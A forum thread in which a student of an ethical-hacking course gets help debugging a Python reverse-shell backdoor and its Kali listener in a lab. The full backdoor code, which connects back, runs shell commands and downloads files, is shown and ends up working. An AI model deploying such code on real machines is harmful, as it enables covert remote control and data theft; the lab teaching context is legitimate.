- This topic has 14 replies, 2 voices, and was last updated 4 years, 6 months ago by Diego Pérez.
- AuthorPosts
- May 25, 2020 at 9:54 pm #38060cybersamuraiDKParticipant
So i am following the course: Learn Python & Ethical Hacking From Scratch with Zaid.
And i am in the section where we setup a backdoor on our windows machine, and a listener in kali linux.
I have followed Zaid’s video 100% and this is the listener code:
#!/usr/bin/env python
import socket
import jsonclass Listener:
def __init__(self, ip, port):
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listener.bind((ip, port))
listener.listen(0)
print(“[+] Waiting for incoming connections”)
self.connection, address = listener.accept()
print(“[+] Got a connection from ” + str(address))def reliable_send(self, data):
json_data = json.dumps(data)
self.connection.send(json_data)def reliable_receive(self):
json_data = “”
while True:
try:
json_data = json_data + self.connection.recv(1024)
return json.loads(json_data)
except ValueError:
continuedef execute_remotely(self, command):
self.reliable_send(command)
if command[0] == “exit”:
self.connection.close()
exit()return self.reliable_receive
def write_file(self, path, content):
with open(path, “wb”) as file:
file.write(content)
return “[+] Download successful.”def run(self):
while True:
command = raw_input(“>> “)
command = command.split(” “)
result = self.execute_remotely(command)
if command[0] == “download”:
result = self.write_file(command[1], result)print(result())
my_listener = Listener(“10.0.2.10”, 4444)
my_listener.run()————————————————————————————————————————————–
I had to rework **print(result())**
Otherwise it looked like this when doing system commands:
[+] Got a connection from (‘10.0.2.15’, 49848)
>> dir
**<bound method Listener.reliable_receive of <__main__.Listener instance at 0x7f7aa7776190>>**But now when i try to download a sample.txt from my windows machine i get this error:
[+] Got a connection from (‘10.0.2.15’, 49846)
>> download sample.txt
Traceback (most recent call last):
File “listener.py”, line 55, in <module>
my_listener.run()**
File “listener.py”, line 49, in run
result = self.write_file(command[1], result)
File “listener.py”, line 40, in write_file
file.write(content)
TypeError: argument 1 must be string or buffer, not instancemethodIt am stuck in this point until i can make it work! have been spending days trying to figure it out 🙁 please help
May 26, 2020 at 6:19 am #38092Diego PérezModeratorHi CyberSamurai!
It looks like the error may be in the backdoor code.
Can you share it please? Also it would be better to share it including identation cause it’s defficult to read it this way.Thanks!
DiegoMay 26, 2020 at 8:08 am #38116cybersamuraiDKParticipantYes sir 🙂
This is the backdoor code running on my windows 10 machine.
#!/usr/bin/env python import socket import subprocess import json import os class Backdoor: def __init__(self, ip, port): self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.connection.connect((ip, port)) def reliable_send(self, data): json_data = json.dumps(data) self.connection.send(json_data) def reliable_receive(self): json_data = "" while True: try: json_data = self.connection.recv(1024) return json.loads(json_data) except ValueError: continue def execute_system_command(self, command): return subprocess.check_output(command, shell=True) def change_working_directory_to(self, path): os.chdir(path) return "[+] Changing CD to " + path def read_file(self, path): with open(path, "rb") as file: return file.read() def run(self): while True: command = self.reliable_receive() if command[0] == "exit": self.connection.close() exit() elif command[0] == "cd" and len(command) > 1: command_result = self.change_working_directory_to(command[1]) elif command[0] == "download": command_result = self.read_file(command[1]) else: command_result = self.execute_system_command(command) self.reliable_send(command_result) my_backdoor = Backdoor("10.0.2.10", 4444) my_backdoor.run()
May 27, 2020 at 5:53 am #38223Diego PérezModeratorHi!
Thanks!Following both codes it results you have this line at the bottom of your listener:
print(result())
please remove the parenthesis of result. Like this print(result)
Let me know how it goes!
DiegoMay 27, 2020 at 9:30 am #38243cybersamuraiDKParticipantWhen i remove the () from print(result()). All terminal commands are like this:
root@kali:~/PycharmProjects/Malware/Backdoor# python listener.py
[+] Waiting for incoming connections
[+] Got a connection from (‘10.0.2.15’, 49834)
>> dir
<bound method Listener.reliable_receive of <__main__.Listener instance at 0x7f1b331b90f0>>
>>May 28, 2020 at 6:18 am #38314Diego PérezModeratorHi! That’s wired. cause calling result() is like calling a function and not a variable.
Can you share the listner again but with identation please?
Also can you add a print in the reliable_recieve function just before the return:
print(json.loads(json_data))Let me know.
DiegoMay 28, 2020 at 6:30 am #38318cybersamuraiDKParticipantThis is the code 🙂 thank you for helping me out, i am a little bit stuck, cant go any further in the course.
forgot something will add more in a moment
May 28, 2020 at 6:40 am #38323cybersamuraiDKParticipantthank you for helping me out 🙂
I still get the same:—————————————————————————
[+] Waiting for incoming connections
[+] Got a connection from (‘10.0.2.15’, 49707)
>> dir
<bound method Listener.reliable_receive of <__main__.Listener instance at 0x7fa8d4aa5190>>
>>————————————————————————————————
#!/usr/bin/env python import socket import json class Listener: def __init__(self, ip, port): listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM) listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) listener.bind((ip, port)) listener.listen(0) print("[+] Waiting for incoming connections") self.connection, address = listener.accept() print("[+] Got a connection from " + str(address)) def reliable_send(self, data): json_data = json.dumps(data) self.connection.send(json_data) def reliable_receive(self): json_data = "" while True: try: json_data = json_data + self.connection.recv(1024) print(json.loads(json_data)) return json.loads(json_data) except ValueError: continue def execute_remotely(self, command): self.reliable_send(command) if command[0] == "exit": self.connection.close() exit() return self.reliable_receive def write_file(self, path, content): with open(path, "wb") as file: file.write(content) return "[+] Download successful." def run(self): while True: command = raw_input(">> ") command = command.split(" ") result = self.execute_remotely(command) if command[0] == "download": result = self.write_file(command[1], result) print(result) my_listener = Listener("10.0.2.10", 4444) my_listener.run()
May 28, 2020 at 6:44 am #38324cybersamuraiDKParticipantThe real strange thing is, that if i write the code like this:
#!/usr/bin/env python import socket import json class Listener: def __init__(self, ip, port): listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM) listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) listener.bind((ip, port)) listener.listen(0) print("[+] Waiting for incoming connections") self.connection, address = listener.accept() print("[+] Got a connection from " + str(address)) def reliable_send(self, data): json_data = json.dumps(data) self.connection.send(json_data) def reliable_receive(self): json_data = "" while True: try: json_data = json_data + self.connection.recv(1024) print(json.loads(json_data)) return json.loads(json_data) except ValueError: continue def execute_remotely(self, command): self.reliable_send(command) if command[0] == "exit": self.connection.close() exit() return self.reliable_receive def write_file(self, path, content): with open(path, "wb") as file: file.write(content) return "[+] Download successful." def run(self): while True: command = raw_input(">> ") command = command.split(" ") result = self.execute_remotely(command) if command[0] == "download": result = self.write_file(command[1], result()) print(result()) my_listener = Listener("10.0.2.10", 4444) my_listener.run()
I end up with this result, when trying to use “download sample.txt”:
>> download sample.txt
TG9yZW0gSXBzdW0gaXMgc2ltcGx5IGR1bW15IHRleHQgb2YgdGhlIHByaW50aW5nIGFuZCB0eXBlc2V0dGluZyBpbmR1c3RyeS4gTG9yZW0gSXBzdW0gaGFzIGJlZW4gdGhlIGluZHVzdHJ5J3Mgc3RhbmRhcmQgZHVtbXkgdGV4dCBldmVyIHNpbmNlIHRoZSAxNTAwcywgd2hlbiBhbiB1bmtub3duIHByaW50ZXIgdG9vayBhIGdhbGxleSBvZiB0eXBlIGFuZCBzY3JhbWJsZWQgaXQgdG8gbWFrZSBhIHR5cGUgc3BlY2ltZW4gYm9vay4gSXQgaGFzIHN1cnZpdmVkIG5vdCBvbmx5IGZpdmUgY2VudHVyaWVzLCBidXQgYWxzbyB0aGUgbGVhcCBpbnRvIGVsZWN0cm9uaWMgdHlwZXNldHRpbmcsIHJlbWFpbmluZyBlc3NlbnRpYWxseSB1bmNoYW5nZWQuIEl0IHdhcyBwb3B1bGFyaXNlZCBpbiB0aGUgMTk2MHMgd2l0aCB0aGUgcmVsZWFzZSBvZiBMZXRyYXNldCBzaGVldHMgY29udGFpbmluZyBMb3JlbSBJcHN1bSBwYXNzYWdlcywgYW5kIG1vcmUgcmVjZW50bHkgd2l0aCBkZXNrdG9wIHB1Ymxpc2hpbmcgc29mdHdhcmUgbGlrZSBBbGR1cyBQYWdlTWFrZXIgaW5jbHVkaW5nIHZlcnNpb25zIG9mIExvcmVtIElwc3VtLg0KDQpXaHkgZG8gd2UgdXNlIGl0Pw0KSXQgaXMgYSBsb25nIGVzdGFibGlzaGVkIGZhY3QgdGhhdCBhIHJlYWRlciB3aWxsIGJlIGRpc3RyYWN0ZWQgYnkgdGhlIHJlYWRhYmxlIGNvbnRlbnQgb2YgYSBwYWdlIHdoZW4gbG9va2luZyBhdCBpdHMgbGF5b3V0LiBUaGUgcG9pbnQgb2YgdXNpbmcgTG9yZW0gSXBzdW0gaXMgdGhhdCBpdCBoYXMgYSBtb3JlLW9yLWxlc3Mgbm9ybWFsIGRpc3RyaWJ1dGlvbiBvZiBsZXR0ZXJzLCBhcyBvcHBvc2VkIHRvIHVzaW5nICdDb250ZW50IGhlcmUsIGNvbnRlbnQgaGVyZScsIG1ha2luZyBpdCBsb29rIGxpa2UgcmVhZGFibGUgRW5nbGlzaC4gTWFueSBkZXNrdG9wIHB1Ymxpc2hpbmcgcGFja2FnZXMgYW5kIHdlYiBwYWdlIGVkaXRvcnMgbm93IHVzZSBMb3JlbSBJcHN1bSBhcyB0aGVpciBkZWZhdWx0IG1vZGVsIHRleHQsIGFuZCBhIHNlYXJjaCBmb3IgJ2xvcmVtIGlwc3VtJyB3aWxsIHVuY292ZXIgbWFueSB3ZWIgc2l0ZXMgc3RpbGwgaW4gdGhlaXIgaW5mYW5jeS4gVmFyaW91cyB2ZXJzaW9ucyBoYXZlIGV2b2x2ZWQgb3ZlciB0aGUgeWVhcnMsIHNvbWV0aW1lcyBieSBhY2NpZGVudCwgc29tZXRpbWVzIG9uIHB1cnBvc2UgKGluamVjdGVkIGh1bW91ciBhbmQgdGhlIGxpa2UpLg0KDQpDb250cmFyeSB0byBwb3B1bGFyIGJlbGllZiwgTG9yZW0gSXBzdW0gaXMgbm90IHNpbXBseSByYW5kb20gdGV4dC4gSXQgaGFzIHJvb3RzIGluIGEgcGllY2Ugb2YgY2xhc3NpY2FsIExhdGluIGxpdGVyYXR1cmUgZnJvbSA0NSBCQywgbWFraW5nIGl0IG92ZXIgMjAwMCB5ZWFycyBvbGQuIFJpY2hhcmQgTWNDbGludG9jaywgYSBMYXRpbiBwcm9mZXNzb3IgYXQgSGFtcGRlbi1TeWRuZXkgQ29sbGVnZSBpbiBWaXJnaW5pYSwgbG9va2VkIHVwIG9uZSBvZiB0aGUgbW9yZSBvYnNjdXJlIExhdGluIHdvcmRzLCBjb25zZWN0ZXR1ciwgZnJvbSBhIExvcmVtIElwc3VtIHBhc3NhZ2UsIGFuZCBnb2luZyB0aHJvdWdoIHRoZSBjaXRlcyBvZiB0aGUgd29yZCBpbiBjbGFzc2ljYWwgbGl0ZXJhdHVyZSwgZGlzY292ZXJlZCB0aGUgdW5kb3VidGFibGUgc291cmNlLiBMb3JlbSBJcHN1bSBjb21lcyBmcm9tIHNlY3Rpb25zIDEuMTAuMzIgYW5kIDEuMTAuMzMgb2YgImRlIEZpbmlidXMgQm9ub3J1bSBldCBNYWxvcnVtIiAoVGhlIEV4dHJlbWVzIG9mIEdvb2QgYW5kIEV2aWwpIGJ5IENpY2Vybywgd3JpdHRlbiBpbiA0NSBCQy4gVGhpcyBib29rIGlzIGEgdHJlYXRpc2Ugb24gdGhlIHRoZW9yeSBvZiBldGhpY3MsIHZlcnkgcG9wdWxhciBkdXJpbmcgdGhlIFJlbmFpc3NhbmNlLiBUaGUgZmlyc3QgbGluZSBvZiBMb3JlbSBJcHN1bSwgIkxvcmVtIGlwc3VtIGRvbG9yIHNpdCBhbWV0Li4iLCBjb21lcyBmcm9tIGEgbGluZSBpbiBzZWN0aW9uIDEuMTAuMzIuDQo=
Traceback (most recent call last):
File “temp.py”, line 57, in <module>
my_listener.run()
File “temp.py”, line 53, in run
print(result())
TypeError: ‘str’ object is not callableMay 29, 2020 at 6:06 am #38441Diego PérezModeratorHi!
Yeah, this last issue makes more sense, it happens cause () makes python think is a function when it is a string, that’s why the error says that a string can not be callable.
Will test your code and let you know.Are you using python2 or 3 to run the code?
Greetings!
DiegoMay 29, 2020 at 7:22 am #38443cybersamuraiDKParticipantI am using python 2 🙂 just like Zaid in the course.
May 30, 2020 at 4:04 am #38528Diego PérezModeratorHi!
Ok! I haven’t had time to test your code yet, will come back as soon as I do it.Greetings!
DiegoJune 2, 2020 at 4:37 am #38799Diego PérezModeratorHi!
Sorry to replay until now but haven’t had so much time to test your code.
Now I did it and found the error, in line “return self.reliable_receive” in execute_remotely you are missing the parenthesis, it should be like this:
return self.reliable_receive() this will make it work.Greetings!
DiegoJune 2, 2020 at 8:00 am #38824cybersamuraiDKParticipantDiego 🙂 i want to thank you with all my heart! It freakin works! 😀 😀
You dont know how many hours/days i have used to try an solve this. I am takin an exam today about cybersec, and this was going to be my master piece 🙂 so you could imagine HOW MUCH i was sweating and biting nails because i couldnt get it to work.
Thank you 🙂 MY presentation is saved!
June 3, 2020 at 5:28 am #38920Diego PérezModeratorHi!
Cool you got it! Glad to help!
Diego - AuthorPosts
- You must be logged in to reply to this topic.